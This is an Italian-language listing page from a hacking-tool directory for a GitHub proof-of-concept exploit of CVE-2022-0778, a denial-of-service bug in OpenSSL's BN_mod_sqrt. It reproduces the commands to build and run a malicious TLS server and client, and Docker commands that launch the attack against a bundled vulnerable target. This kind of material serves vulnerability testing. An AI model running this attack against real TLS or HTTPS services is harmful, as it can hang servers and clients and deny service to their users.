Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2022-0778 — Exploit proof-of-concept per CVE-2022-0778, una vulnerabilità di denial-of-service in BN_mod_sqrt di OpenSSL. Include implementazioni di server e client malevoli per attivare loop infiniti in connessioni TLS/HTTPS vulnerabili. | Kitploit
Strumenti/GitHubGitHub/yywing/cve-2022-0778
Analisi delle VulnerabilitàExploitSicurezza WebSicurezza di RetePenetration Testing
GitHubyywing/cve-2022-0778

cve-2022-0778

Exploit proof-of-concept per CVE-2022-0778, una vulnerabilità di denial-of-service in BN_mod_sqrt di OpenSSL. Include implementazioni di server e client malevoli per attivare loop infiniti in connessioni TLS/HTTPS vulnerabili.

Vedi Repository
954 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

cve-2022-0778

server malintenzionato

root@kitploit:~
go run server/main.go --addr 127.0.0.1:12345

cd test && test_server.sh

docker stat

client malintenzionato

root@kitploit:~
cd test && test_client.sh

go run client/main.go  --network tcp --addr 127.0.0.1:12345

docker stat

build

root@kitploit:~
docker build -t cve-2022-0778 .

docker hub

root@kitploit:~
# avvia il server vulnerabile
docker pull yywing/cve-2022-0778-target
docker run -it --rm -p 12345:12345 yywing/cve-2022-0778-target python server.py
# attacco
docker pull yywing/cve-2022-0778
docker run -it --rm --entrypoint badclient yywing/cve-2022-0778 --addr host.docker.internal:12345

# avvia il server malintenzionato
docker run -it --rm -p 12345:12345 yywing/cve-2022-0778 --addr 0.0.0.0:12345
# usa il client vulnerabile
docker run -it --rm yywing/cve-2022-0778-target python -c "import http.client;http.client.HTTPSConnection('host.docker.internal', 12345).request('GET', '/')"
# oppure
docker run -it --rm yywing/cve-2022-0778-target curl https://host.docker.internal:12345
Scarica lo strumento